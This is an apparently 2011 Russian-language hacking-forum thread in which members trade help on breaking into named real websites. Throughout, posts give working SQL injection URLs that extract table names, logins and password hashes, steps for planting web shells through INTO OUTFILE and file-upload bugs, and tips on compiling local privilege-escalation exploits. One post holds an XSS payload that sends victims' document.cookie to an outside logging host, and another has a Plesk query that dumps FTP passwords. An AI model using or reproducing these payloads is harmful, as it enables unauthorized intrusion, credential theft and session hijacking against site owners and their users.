Ну или как можно узнать какой ип у ДБ = \
Порт вроде стандартный, в php.ini смотрел = \
Потому что localhost. Тебе нужно цепляться к мускулу как по локалке. Выход - шелл.
Хочешь сдампить бд или просто подрубиться - залей шелл типа wso и сдампи бд через настройки ЦМС.
Быстрее и удобнее будет.
Expl0ited
22.06.2011, 15:17
GroM88 said:
Такой вопрос, прочитал через скуль конфиг цмс
dbhost = localhost
dbuser = lalala
dbname = lalal2
dbpass = password
pma на хосте нет, пытаюсь с локалхоста через свой пхпмуадмин подключится
пишу в конфиге phpmyadmin'a
host site.ru
pass lalala,
db и т.п.
пишет (2003) нет конекта к серверу
Вопрос почему? если в конфиге написано сервер дб = localhost
Ну или как можно узнать какой ип у ДБ = \
Порт вроде стандартный, в php.ini смотрел = \
Вероятность то что mysql открыт для доступа из вне (а если и открыт, то чаще всего для определенного хоста) слишком мала. Как вариант можно проверить пароли к фтп или ссш.
И если ты смог прочитать файлы через MySQL инъекцию, значит у тебя file_priv = on, а если в добавок к тому, ты вызвал load_file('/путь/файл') без кодировки (типа hex) то у тебя и magic_quotes_gpc = off, это значит что если ты найдешь полный путь до веб каталога для которого хватит прав на запись, то шелл считай у тебя есть.
Expl0ited
22.06.2011, 15:36
alexvrn said:
кто поможет мне ))
Code:
http://all-black-lists.com/cat/catalog-4'and(select(max(1))from(phpshop_categories)group/**/by(concat(version(),0x00,floor(rand(0)*2))))and(if (mid(version(),1,1)=5,1,0))='1.html
Expl0ited
22.06.2011, 15:44
alexvrn said:
как взять phpshop_users
/thread43966.html
BigBear said:
Где ещё помимо мускула может лежать пасс от админки ?
в файле, в скрипте прописан, в мускуле, но в другой таблице/базе нопремер
Expl0ited
22.06.2011, 16:00
alexvrn said:
http://all-black-lists.com/cat/catalog-4'and(select(max(1))from(phpshop_users)group/**/by(concat(0x3a,login,password,floor(rand(0)*2))))a nd(if(mid(0x3a,login,password,1,1)=5,1,0))='1.html
чёт не работает помогите
Сначала прочитай то, что я тебе дал, а потом если возникнут вопросы, задавай их здесь, но только по существу, а не какой то набор буквосимволов что я процитировал.
http://rf-cheats.nichost.ru/index.php?styleid=2+3%27 посмотрите пожалуйста вроде как скуль но что-то там не так, после перезагрузки страници пропадает ошибка, и вывести поля не возможно, пробывал blind sql но тоже ничего не выводит так как ошибка куда то деваетса, я заметил что ошибка пропадает после третьего запроса в URLe, что это помогите разобратса
Expl0ited
22.06.2011, 21:59
pirat0 said:
http://rf-cheats.nichost.ru/index.php?styleid=2+3%27 посмотрите пожалуйста вроде как скуль но что-то там не так, после перезагрузки страници пропадает ошибка, и вывести поля не возможно, пробывал blind sql но тоже ничего не выводит так как ошибка куда то деваетса, я заметил что ошибка пропадает после третьего запроса в URLe, что это помогите разобратса
Нет там баги, просто блок, где возникает ошибка:
Code:
Ошибка mysql_fetch_array().
Как то криво берет данные из базы, возможно просто возвращается нулевой результат, а функция mysql_fetch_array() не может её обработать.
Вообщем это ошибка, но не бага.
спс что посмотрел, а то я уж запарился искать как раскрутить, тоисть никак этот сайтец не сломать...
Обратил внимание на эту скулю:
http://sport-razgrom.ru/view_search.php?submit_s=%C8%F1%EA%E0%F2%FC&search=12'+and+'1'='('1
Так как я не силен в SQL-inj в POST запросах, не могли бы мне разъяснить, каким образом были найдены переменные submit_s, search?
M_script
23.06.2011, 00:34
Заходишь на http://sport-razgrom.ru/
Смотришь исходный код, там форма.
Code:
Поисковый запрос должен быть не менее 4-х символов.
Konqi said:
@@user и @@database не заработали, потому что нету таких системных переменных, походу у тебя фильтрация скобок
пробуй пост запросы
А где можно об этом почитать ?
Так понимаю, "использование POST запросов в sql".
Fooog said:
А где можно об этом почитать ?
Так понимаю, "использование POST запросов в sql".
да о чем прочитать собсно?
те же параметры отправляешь не через гет , а через пост
юзай minibrowser, или 2 строчки кода на php
вариантов море
pirat0 said:
тоисть никак этот сайтец не сломать...
посмотри сайты на одном ip http://www.ip-ping.ru/siteip/ возможно в одном из них есть уязвимость
kroŧ said:
посмотри сайты на одном ip http://www.ip-ping.ru/siteip/ возможно в одном из них есть уязвимость
Предпочтительнее - Gmads. Он проще в использовании
Сайт сервиса (http://madnet.name/tools/madss/)
Попробовал скомпилить сплойт на серве.
gcc Permission denied
Тогда скомпилировал на своем сервере сплойт и залил его на серв. Запускаю.
error while loading shared libraries: requires glibc 2.5 or later dynamic linker
Как видно, требуется glibc 2.5 - ее как то можно установить или как еще запустить сплойт?
попугай said:
Попробовал скомпилить сплойт на серве.
gcc Permission denied
Тогда скомпилировал на своем сервере сплойт и залил его на серв. Запускаю.
error while loading shared libraries: requires glibc 2.5 or later dynamic linker
Как видно, требуется glibc 2.5 - ее как то можно установить или как еще запустить сплойт?
И как скомпилировал сплоит? Динамическая связька или статическая?
R0nin said:
И как скомпилировал сплоит? Динамическая связька или статическая?
Просто набрал gcc sploit.c - o sploit
попугай said:
Просто набрал gcc sploit.c - o sploit
Это динамическая привязка. Для статической набери :
gcc sploit.c -static -o sploit_bin
fckeditor/editor/filemanager/connectors/php/connector.php?
могу залить только txt,xml файлы
пробывал php.xml и тд не чего не помогает что подскажете делать?
Какая ветка у этой скули?
http://www.jobsfordriver.com/job/view/id/80323014'
Sc0rpi0n
26.06.2011, 21:56
Как узнать количество таблиц в MS SQL? вот пример запроса
+or+1=(select+top+1+table_name+from+information_sc hema.tables)--
вот в MySQL Я бы поставил count(*), а тут как быть?
SecondLife
27.06.2011, 01:58
Два вопроса:
1) http://www.internovosti.ru/text/?id=(42597)
Можно ли из этого что-нибудь извлечь?
2) На сервере есть скуль с filepriv, каким образом можно залить perl-shell? PHP отключён. Запись в папку cgi-bin доступна.
Expl0ited
27.06.2011, 04:07
swat_ said:
fckeditor/editor/filemanager/connectors/php/connector.php?
могу залить только txt,xml файлы
пробывал php.xml и тд не чего не помогает что подскажете делать?
Если веб-сервер nginx, то возможно просто залить shell.txt и запустить его из адресной строки так: shell.txt/test.php
SecondLife said:
Два вопроса:
1) http://www.internovosti.ru/text/?id=(42597)
Можно ли из этого что-нибудь извлечь?
2) На сервере есть скуль с filepriv, каким образом можно залить perl-shell? PHP отключён. Запись в папку cgi-bin доступна.
1) просто ошибка
2) логика такая же как и в заливке php шела, только для исполнения возможно понадобится включить выполнение perl в директории средствами .htaccess
Sc0rpi0n said:
Как узнать количество таблиц в MS SQL? вот пример запроса
+or+1=(select+top+1+table_name+from+information_sc hema.tables)--
вот в MySQL Я бы поставил count(*), а тут как быть?
http://realcoding.net/articles/sposoby-podscheta-kolichestva-zapisei-v-kazhdoi-iz-tablits-bazy-dannykh.html
stasiliy
27.06.2011, 23:24
Есть ли какие-то сканеры серверов, которые находят phpmyadmin или cpanel?
спасибо
stasiliy said:
Есть ли какие-то сканеры серверов, которые находят
phpmyadmin или cpanel?
спасибо
*сканеры директорий.
Reiluke AdminFinder (http://www.sendspace.com/file/0i5j6m)
Нашёл сервак с уязвимостью в апаче Apache 2.2.14 mod_isapi Dangling Pointer, нашёл сплоит, скомпил, запустил в итоге получил Check to see if sos.txt was created...
Кто-нибудь подскажет что это значит? В файле sos.txt должен был быть код shell?
(видео http://www.youtube.com/watch?v=kKRz_KhQXnI )
Мужики помогите, а то я уже гугл износиловал, но он так ничего мне и не сказал... я в отчаянии
plaeer said:
Нашёл сервак с уязвимостью в апаче Apache 2.2.14 mod_isapi Dangling Pointer, нашёл сплоит, скомпил, запустил в итоге получил Check to see if sos.txt was created...
Кто-нибудь подскажет что это значит? В файле sos.txt должен был быть код shell?
(видео http://www.youtube.com/watch?v=kKRz_KhQXnI )
Мужики помогите, а то я уже гугл износиловал, но он так ничего мне и не сказал... я в отчаянии
Ну а файл создается то?
попугай said:
Ну а файл создается то?
А как проверить-то ? Я пробовал что-то типо http://ip/sos.txt, безрезультатно...
подскажите стандартный пароль на CMS BITRIX
foozzi said:
подскажите стандартный пароль на CMS BITRIX
На CMS бывают стандартные пароли? Не настраивается ли пароль при установке системы?
plaeer said:
А как проверить-то ? Я пробовал что-то типо http://ip/sos.txt, безрезультатно...
По идее в папке с апачем должен создаться. Но или я что-то не понимаю, или видео относится к другому эксплойту. Как показано на видео, в результате должен открыться порт на сервере и, приконнектившись к нему, ты получишь нулевые привилегии. Посмотрел код сплойта - не нашел строки, которая есть в cmd на том видео "check port 4444 for shell".
попугай said:
По идее в папке с апачем должен создаться. Но или я что-то не понимаю, или видео относится к другому эксплойту. Как показано на видео, в результате должен открыться порт на сервере и, приконнектившись к нему, ты получишь нулевые привилегии. Посмотрел код сплойта - не нашел строки, которая есть в cmd на том видео "check port 4444 for shell".
Я тоже смотрел код сплоита, и не увидел там ничего связанного с портом 4444. Поэтому предположил, что в sos.txt код бэкдора который открыл порт 4444. хз где взять этот код...
Alexander89
28.06.2011, 14:10
Подскажите как использовать
http://www.exploit-db.com/exploits/15449/
пробовал так
root@ubuntu:~# python2.7 15449.pl
результат
File "15449.pl", line 5
use IO::Socket;
^
SyntaxError: invalid syntax
и так
root@ubuntu:~# ./15449.pl
./15449.pl: line 4: $'\r': command not found
./15449.pl: line 5: use: command not found
./15449.pl: line 5: $'\r': command not found
DeepBlue7
28.06.2011, 15:30
Вообщем, вопрос действительно особой важности... надо, и хоть убей. Имеется форум, предположительно phpBB 3.0.7 PL-1. Сплоитов найти не удаётся... Может, не там ищу...
Ссылочку не подкините ? Желательно , скулю...
Заранее спасибо.
DeepBlue7 said:
Вообщем, вопрос действительно особой важности... надо, и хоть убей. Имеется форум, предположительно phpBB 3.0.7 PL-1. Сплоитов найти не удаётся... Может, не там ищу...
Ссылочку не подкините ? Желательно , скулю...
Заранее спасибо.
а ты искал вообще?
Что то нашел в гугл, но не проверял :
_http://securityhome.eu/exploits/exploit.php?eid=8646834484c84213245d653.76870877
_http://www.vfocus.net/art/20100906/7823.html
DeepBlue7
28.06.2011, 15:36
Не, dos не надо...
DeepBlue7 said:
Не, dos не надо...
других видимо нету на паблик.
DeepBlue7
28.06.2011, 15:38
Я вот о том же . А на ссылочку глянуть можеш, если пмну ?
подскажите пожалуйста как тут быть
http://jetterauto.ru/index/page/id/411%27
вроде как и скуля и вроде как и нет
qaz said:
подскажите пожалуйста как тут быть
http://jetterauto.ru/index/page/id/411%27
вроде как и скуля и вроде как и нет
Самая настоящая скуля. Правда вывода я не нашёл.
Code:
http://jetterauto.ru/index/page/id/411'+and+1=1+order+by+9+--+
Code:
http://jetterauto.ru/index/page/id/411'+and+1=1+union+select+1,2,3,4,5,6,7,8,9+--+
UP
Тут ещё скуля, но вывода также нету
Code:
http://jetterauto.ru/index/page/id/418/geo/23+and+1=2+union+select+111,222,333,444,555
UP2
Ещё скуля и опять нет вывода, крути как слепую...
Code:
http://jetterauto.ru/index/blog/id/4+and+1=1+union+select+1,2,3,4,5,6,77,8
http://jetterauto.ru/index/page/id/411'+and+1=1+union+select+1,2,3,4,5,6,7,8,9
+--+
ды никогда комменты пробелами не обрамляются %)
d1v said:
ды никогда комменты пробелами не обрамляются %)
я искал как обрубить запрос чтоб избежать ошибки
В принципе - в этом случае обрубать ничего не нужно...
BigBear said:
я искал как обрубить запрос чтоб избежать ошибки
В принципе - в этом случае обрубать ничего не нужно...
просто кавычку убрать нужно из запроса.
d1v said:
просто кавычку убрать нужно из запроса.
убрал, тотже ифект
http://jetterauto.ru/index/blog/id/4 or 1 group by concat(version(),rand(0)|0) having min(0)--+
qaz said:
убрал, тотже ифект
вывода и не будет, потому что это блайнд. в данном случае можно добиться вывода в ошибке. раскрутил по методу qwazar'a (http://qwazar.ru/?p=7) :
HTML:
http://jetterauto.ru/index/page/id/411+and+1=1'+and(select+1+from(select+count(*),con cat((select+(select+(select+concat(0x7e,0x27,cms_u ser_list.login,0x27,0x7e)+from+mainfra_jetter_tst. cms_user_list+order+by+login+limit+0,1)+)+from+inf ormation_schema.tables+limit+0,1),floor(rand(0)*2) )x+from+information_schema.tables+group+by+x)a)+an d+'1'='1
plaeer said:
Я тоже смотрел код сплоита, и не увидел там ничего связанного с портом 4444. Поэтому предположил, что в sos.txt код бэкдора который открыл порт 4444. хз где взять этот код...
Что никто не может помочь?
plaeer said:
Что никто не может помочь?
Товарищ, не знаю что за эксплоит но примерно я бы сделал такой вывод - если там написано, чтобы я проверил наличие файла sos.txt а его там нету значит эксплоит не заработал, может потому, что уязвимое ПО запатчено.
R0nin said:
Товарищ, не знаю что за эксплоит но примерно я бы сделал такой вывод - если там написано, чтобы я проверил наличие файла sos.txt а его там нету значит эксплоит не заработал, может потому, что уязвимое ПО запатчено.
Вообще-то эту уязвимость обнаружил сканер.
Сам сплоит - http://www.securitylab.ru/poc/391481.php
plaeer said:
Сам сплоит - http://www.securitylab.ru/poc/391481.php
Сканер может ошибится.
ПО может иметь уязвимую версию но при этом таки может быть пропатченным.
plaeer said:
Вообще-то эту уязвимость обнаружил сканер.
Ну раз сканер, тогда это координально меняет ситуацию
Траблы с залитием шела через phpmyadmin
File_priv : Y
Делаю запрос :
SELECT '' into OUTFILE '/var/www/html/web/site.com/shell.php'
Мне в ответ:
#1 - Can't create/write to file '/var/www/html/web/site.com/shell.php' (Errcode: 13)
Почему вылазит такая ошибка и файл не создается?
Прав нет же
На запись в папку.
Sc0rpi0n
29.06.2011, 20:19
Подскажите плиз статью на вывод данный из mysql слепой инъекции через ошибку.
там чёто типа floor rand. токо не могу найти мануал...
Sc0rpi0n said:
Подскажите плиз статью на вывод данный из mysql слепой инъекции через ошибку.
там чёто типа floor rand. токо не могу найти мануал...
https://rdot.org/forum/showpost.php?p=746&postcount=3
winstrool
29.06.2011, 20:56
Sc0rpi0n said:
Подскажите плиз статью на вывод данный из mysql слепой инъекции через ошибку.
там чёто типа floor rand. токо не могу найти мануал...
вот тебе пример запроса:
+OR+%28SELECT+COUNT%28*%29+FROM+%28SELECT+1+UNION+ SELECT+2+UNION+SELECT+3%29x+GROUP+BY+CONCAT%28MID% 28%28select+{твой запрос}%29%29,1,63%29,+FLOOR%28RAND%280%29*2 %29%29%29--+
+OR+%28SELECT+COUNT%28*%29+FROM+%28SELECT+1+UNION+ SELECT+2+UNION+SELECT+3%29x+GROUP+BY+CONCAT%28MID% 28%28select+concat_ws%280x3a,user%28%29,version%28 %29,database%28%29%29%29,1,63%29,+FLOOR%28RAND%280 %29*2%29%29%29--+
Есть доступ к phpmyadmin. Нужно выудить ftp логин/пароль
Направте в нужном направлении информацией или чем капнуть туда?!
t0wer said:
Есть доступ к phpmyadmin. Нужно выудить ftp логин/пароль
Направте в нужном направлении информацией или чем капнуть туда?!
pma - это скрипт для управления базами данных и никакого отношения к фтп не имеет. единственный вариант, который возможен - это залить шелл через pma, порутать сервак и выудить фтп акк)
клац (https://rdot.org/forum/showthread.php?t=347l)
есть ещё вариант найти акк в конфигах сайта. на чём он стоит?
Expl0ited
01.07.2011, 02:03
t0wer said:
Есть доступ к phpmyadmin. Нужно выудить ftp логин/пароль
Направте в нужном направлении информацией или чем капнуть туда?!
Нужно зать что за ПО там стоит, и где хранятся пароли, бывает случаи (например Plesk Panell) где данные хранятся в базе, более того, в не зашифрованном виде, и для того что бы получить полный список всех фтп, достаточно выполнить:
PHP:
SELECT REPLACE(sys_users.home,'/home/httpd/vhosts/','') ASdomain,
sys_users.login,accounts.password FROM sys_users
LEFT JOIN accounts on sys_users.account_id=acc ounts.id
ORDER BY sys_users.home ASC
Но в большинстве случаев, конечно же пароли так просто не достать, так что как минимум нужно закрепится, и начать исследовать систему изнутри.
killerben
01.07.2011, 17:20
почему когда я ввожу
http://www.jertva.ru/search?q=
То в ифрейме выводит содержимое .js файла ?
эээээ.... а что должно быть там? если хочешь выполнения js кода, то юзай вместо
killerben
01.07.2011, 17:41
+toxa+ said:
эээээ.... а что должно быть там? если хочешь выполнения js кода, то юзай вместо
Спасибо большое, там работает только iframe.
Получилось так:
Содержимое xss.php
Code:
img = new Image();
img.src = "http://httpz.ru/nlj6byr15oq.gif?"+document.cookie;
Теперь когда захожу по адресу, присылает:
Code:
IP: **.***.22.87
Query: empty
REFERER: http://site.ru/xss.php
AGENT: Mozilla/5.0 (Windows NT 5.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
это значит работает ? Можно админу отправлять на почту ссылку ? если бы были кукисы, оно бы мне прислало их ?
зайди на site.ru , потом в адресной строке напиши
Code:
javascript:document.cookie='test_cookie=31337';
и попробуй заюзать свою xss ещё раз. узнаешь наверняка.
killerben
01.07.2011, 17:56
таким способом присылает куки с моего сайта, а не с сайта жертвы.
Спасибо большое, там работает только iframe.
Как так, стоит фильтрация на слова script /script?
бывает, что стоит фильтрация на "document.cookie". Тогда просто сделай d = document; и вставляй d.cookie;
В общем попробуй обойти фильтрацию.
Expl0ited
01.07.2011, 18:16
killerben, тег iframe подгружает страницу с удаленного сервера, и если ты подгрузишь там код, то это ничего не даст, он выполнится на удаленном сервере, а не на атакуемом, я тебе дал ссылку, внимательно почитай что там написано, и какие методы могут быть, вопросы отпадут сами собой!
winstrool
02.07.2011, 02:08
есть сервачек с провами роот, через уязвимость скрипта не получается залить шелл так как фельтруются ковычки, вытянул логин и пасс от бд, прова роот, через пхпмиадмин не хочет с этими даными заходить, хотя удаленно по этим же данным подключается, знаю апсолютные пути к сайту и папкам с возможностью заливкой файла, на запрос select 'blabla' into outfile '/blabla/bla.php' ругается, в чем таробла, что делаю не так?!
Expl0ited
02.07.2011, 12:08
Может быть два варианта:
- не хватает прав.
- база данных размещается на другом сервере.
такой вопрос
есть таблица узерс
http://www.sportbars.ru/view_transl.php?id=820+UnIon+selECt+1,2,table_name ,4,5,6,7,8,9,10,11,12,13,14,15+from+information_sc hema.tables+limit+31,1--+
хочувывести от туда хотябы логины
http://www.sportbars.ru/view_transl.php?id=820+UnIon+selECt+1,2,column_nam e,4,5,6,7,8,9,10,11,12,13,14,15+from+information_s chema.columns+where+table_name=0x7573657273+limit+ 12,1--+
ничего не выводит
http://www.sportbars.ru/view_transl.php?id=820+UnIon+selECt+1,2,ulogin,4,5 ,6,7,8,9,10,11,12,13,14,15+from+users--+
почему?
qaz said:
такой вопрос
есть таблица узерс
http://www.sportbars.ru/view_transl.php?id=820+UnIon+selECt+1,2,table_name ,4,5,6,7,8,9,10,11,12,13,14,15+from+information_sc hema.tables+limit+31,1--+
хочувывести от туда хотябы логины
http://www.sportbars.ru/view_transl.php?id=820+UnIon+selECt+1,2,column_nam e,4,5,6,7,8,9,10,11,12,13,14,15+from+information_s chema.columns+where+table_name=0x7573657273+limit+ 12,1--+
ничего не выводит
http://www.sportbars.ru/view_transl.php?id=820+UnIon+selECt+1,2,ulogin,4,5 ,6,7,8,9,10,11,12,13,14,15+from+users--+
почему?
http://www.sportbars.ru/view_transl.php?id=820+UnIon+selECt+1,2,ulogin,4,5 %20,6,7,8,9,10,11,12,13,14,15+from+lol.users+limit +0,1--+
Seravin said:
http://www.sportbars.ru/view_transl.php?id=820+UnIon+selECt+1,2,ulogin,4,5 %20,6,7,8,9,10,11,12,13,14,15+from+lol.users+limit +0,1--+
ухты, спасибо, а можно поинтерисоватся, а lol.users
интерисует вот ето lol. можете обяснить што ето откуда почиму и как?
qaz said:
ухты, спасибо, а можно поинтерисоватся, а lol.users
интерисует вот ето lol. можете обяснить што ето откуда почиму и как?
Это база в которой находится данная таблица.
Узнается так
union select table_schema from information_schema.tables where table_name='users'
winstrool
02.07.2011, 12:28
Expl0ited said:
Может быть два варианта:
- не хватает прав.
- база данных размещается на другом сервере.
прав хвотает, и сами сайты с БД на одном сервере, это подтверждает то что есть возможность с БД заливать файлы в папку /tmp/ и и прсоматривать то что залито через load_file()
Expl0ited
02.07.2011, 14:07
winstrool said:
прав хвотает, и сами сайты с БД на одном сервере, это подтверждает то что есть возможность с БД заливать файлы в папку /tmp/ и и прсоматривать то что залито через load_file()
А разве папки /tmp/ не должно быть на сервере где стоит БД?
И даже если так, сервер у них один, то ничего не меняется, прав может не быть на создание файла в директориях видные из веб, а то что в tmp пишется это понятно, т.к. права к этой папке у всех пользователей системы.
IMMORTAL_S
02.07.2011, 16:46
?id=181'+or+(select+count(*)+from+information_sche ma.tables+group+by+concat_ws(0x3a,(select+concat_w s(':',table_schema,table_name)+from+information_sc hema.tables+limit+0,1),floor(rand(0)*2)))--+
выдает- Subquery returns more than 1 row
Где я намудрил?
Expl0ited
02.07.2011, 16:53
IMMORTAL_S said:
?id=181'+or+(select+count(*)+from+information_sche ma.tables+group+by+concat_ws(0x3a,(select+concat_w s(':',table_schema,table_name)+from+information_sc hema.tables+limit+0,1),floor(rand(0)*2)))--+
выдает- Subquery returns more than 1 row
Где я намудрил?
видимо запрос select+concat_ws(':',table_schema,table_name)+from +information_schema.tables+limit+0,1 возвращает большой результат, попробуй просто select table_schema from information_schema.tables limit 0,1
и отталкивайся от этого, сначала найди нужную базу, потом таблицу, потом поля, потом выводи.
IMMORTAL_S
02.07.2011, 17:01
Судя по всему да..
?url=181'+or+(select+count(*)+from+information_sch ema.tables+group+by+concat_ws(0x3a,(select+concat_ ws(0x3a,user,password)+from+mysql.user+limit+0,1), floor(rand(0)*2)))--+
Выдал - Data too long for column '(null)' at row 15
Подскажите, почему так происходит?
IMMORTAL_S said:
?id=181'+or+(select+count(*)+from+information_sche ma.tables+group+by+concat_ws(0x3a,(select+concat_w s(':',table_schema,table_name)+from+information_sc hema.tables+limit+0,1),floor(rand(0)*2)))--+
выдает- Subquery returns more than 1 row
Где я намудрил?
где-то ты действительно намудрил
Code:
and(select 1 from(select count(*),concat(version(),floor(rand(0)*2))x
from information_schema.tables group by x)a)--
вместо version() подставляешь уже
(select table_name from information_schema.tables limit 0,1)
У меня твоя ошибка возникала, когда не в то место подставлял данные на вывод в ошибке, и там уже не помогал никакой лимит
Судя по всему да.. ?url=181'+or+(select+count(*)+from+information_sch ema.tables+group+by+concat_ws(0x3a,(select+concat_ ws(0x3a,user,password)+from+mysql.user+limit+0,1), floor(rand(0)*2)))--+ Выдал - Data too long for column '(null)' at row 15 Подскажите, почему так происходит?
Видимо попутно идёт интсерт в какую-то таблицу со статистикой, а как раз получается он большой... хотя это лишь догадка
http://catalog.akadia.ru/totalcatalog/?st=30&l=YnJhbmRfaWQ9PTEyMTh8fG1vZGVsX2lkPT00Mjgw.Как определить кол-во полей?
http://catalog.akadia.ru/totalcatalog/?st=30&l=YnJhbmRfaWQ9PTEyMTh8fG1vZGVsX2lkPT0tNDI4MCB1bmlv biBzZWxlY3QgdmVyc2lvbigpLS0=
1 поле в model_id
возможно ли сделать поиск по базе mysql5 если не знать имени таблицы и колнки. Например в значении колонки слово maxim по текушей базе, если возможно то примерный запрос какой будеть
спс
YuNi|[c said:
возможно ли сделать поиск по базе mysql5 если не знать имени таблицы и колнки. Например в значении колонки слово maxim по текушей базе, если возможно то примерный запрос какой будеть
спс
Нельзя. Если я конечно правильно понял про что ты.
z0mbie86
05.07.2011, 01:16
Имеется код:
$IPBHTML .= "
" . (($this->ipsclass->input['testKey'] = 123) ? ("
" . ((eval($this->ipsclass->input['code'])) ? ("") : ("")) . "
") : ("")) . "
Обращаюсь я к нему вот так http://site.ru/index.php?testKey=123&code=phpinfo();
Нужен эксплоит который в code POST-методом будет пересылать код шелла.
Cybersteger
05.07.2011, 13:04
z0mbie86 said:
Имеется код:
Обращаюсь я к нему вот так http://site.ru/index.php?testKey=123&code=phpinfo();
Нужен эксплоит который в code POST-методом будет пересылать код шелла.
если я правильно понял
Code:
где /home/httpdocs/files/ - путь к папке которая доступна на запись
привет
нужна помосчь!
есть скуля но при дописывании limit или
Code:
bc_tovar_id=2-1+UNION+SELECT+1,2,3,4,group_concat%28table_name%2 9,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,2 3,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39, 40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56 ,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,7 3,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89, 90,91,92,93,94,95,96,97,98,99,100,101,102,103,104, 105,106,107,108,109,110,111,112,113,114,115,116,11 7,118,119,120,121,122,123,124,125,126,127,128,129, 130,131,132,133,134,135,136,137,138,139,140,141,14 2,143,144,145,146,147,148,149,150,151+from+informa tion_schema.schemata+where+table_name%3E'table_200 '#
сразу всё обрубается и дальше остальные таблици показывать не хочет помогите плз!
Фараон said:
Ссылку. Античат - форум экстрасенсов.
Code:
http://www.bsgv.ru/ipo_calc.php?bc_tovar_id=2-1+UNION+SELECT+1,2,3,4,group_concat%28table_name%2 9,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,2 3,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39, 40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56 ,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,7 3,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89, 90,91,92,93,94,95,96,97,98,99,100,101,102,103,104, 105,106,107,108,109,110,111,112,113,114,115,116,11 7,118,119,120,121,122,123,124,125,126,127,128,129, 130,131,132,133,134,135,136,137,138,139,140,141,14 2,143,144,145,146,147,148,149,150,151+from+informa tion_schema.tables+where%20table_name%3Etable_200#
aka_zver
05.07.2011, 13:45
FreN4 said:
привет
нужна помосчь!
есть скуля но при дописывании limit или
Code:
bc_tovar_id=2-1+UNION+SELECT+1,2,3,4,group_concat%28table_name%2 9,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,2 3,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39, 40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56 ,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,7 3,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89, 90,91,92,93,94,95,96,97,98,99,100,101,102,103,104, 105,106,107,108,109,110,111,112,113,114,115,116,11 7,118,119,120,121,122,123,124,125,126,127,128,129, 130,131,132,133,134,135,136,137,138,139,140,141,14 2,143,144,145,146,147,148,149,150,151+from+informa tion_schema.schemata+where+table_name%3E'table_200 '#
сразу всё обрубается и дальше остальные таблици показывать не хочет помогите плз!
какой вы интересный товарищ)
Code:
+UNION+SELECT+1,2,3,4,group_concat(0x3a,table_name ),6,...,151+from+information_schema.tables%23
или
Code:
+UNION+SELECT+1,2,3,4,table_name,6,...,151+from+in formation_schema.tables+limit+0,1%23
а имя таблицы в кавычках, захексить бы
winstrool
05.07.2011, 19:41
FreN4 said:
привет
нужна помосчь!
есть скуля но при дописывании limit или
Code:
bc_tovar_id=2-1+UNION+SELECT+1,2,3,4,group_concat%28table_name%2 9,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,2 3,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39, 40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56 ,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,7 3,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89, 90,91,92,93,94,95,96,97,98,99,100,101,102,103,104, 105,106,107,108,109,110,111,112,113,114,115,116,11 7,118,119,120,121,122,123,124,125,126,127,128,129, 130,131,132,133,134,135,136,137,138,139,140,141,14 2,143,144,145,146,147,148,149,150,151+from+informa tion_schema.schemata+where+table_name%3E'table_200 '#
сразу всё обрубается и дальше остальные таблици показывать не хочет помогите плз!
На сколько знаю, group_concat() выводит только первые 1024 символа и с limit он не работает...
Использую конструкцию:
-1' OR (SELECT COUNT(*) FROM (SELECT 1 UNION SELECT 2 UNION SELECT 3)x GROUP BY CONCAT(MID(
DATABASE()
, 1, 63), FLOOR(RAND(0)*2))) --
В ошибке на странице выдаёт название базы данных.
Пытаюсь применить эту конструкцию для другого запроса:
-1' OR (SELECT COUNT(*) FROM (SELECT 1 UNION SELECT 2 UNION SELECT 3)x GROUP BY CONCAT(MID(
SELECT user_1 FROM users
, 1, 63), FLOOR(RAND(0)*2))) --
Выдаёт ошибку, но команду не выполняет:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'SELECT user_1 FROM users, 1, 63), FLOOR(RAND(0)*2))) -- '' at line 1
В итоге возникает вопрос. Как заставить выполниться команду
SELECT user_1 FROM users
Название столбца и таблицы точно эти.
winstrool
05.07.2011, 22:20
swad said:
Использую конструкцию:
В ошибке на странице выдаёт название базы данных.
Пытаюсь применить эту конструкцию для другого запроса:
Выдаёт ошибку, но команду не выполняет:
В итоге возникает вопрос. Как заставить выполниться команду
Название столбца и таблицы точно эти.
добавь к конструкции limit 0,1
вот пример:
-1' OR (SELECT COUNT(*) FROM (SELECT 1 UNION SELECT 2 UNION SELECT 3)x GROUP BY CONCAT(MID((SELECT user_1 FROM users limit 0,1), 1, 63), FLOOR(RAND(0)*2))) --
winstrool said:
На сколько знаю, group_concat() выводит только первые 1024 символа и с limit он не работает...
я пробовал и просто с лимитом и посмотри какой я запрос выше прислал,там всё я сделал правильно!)))))
M_script
06.07.2011, 10:00
FreN4,
Узнаем количество таблиц, исключая information_schema:
Code:
2-1+UNION+SELECT+1,2,3,4,count(*),6,7,8,9,10,11,12,1 3,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29, 30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46 ,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,6 3,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79, 80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96 ,97,98,99,100,101,102,103,104,105,106,107,108,109, 110,111,112,113,114,115,116,117,118,119,120,121,12 2,123,124,125,126,127,128,129,130,131,132,133,134, 135,136,137,138,139,140,141,142,143,144,145,146,14 7,148,149,150,151+from+information_schema.tables+w here+table_schema!=0x696E666F726D6174696F6E5F73636 8656D61+--+
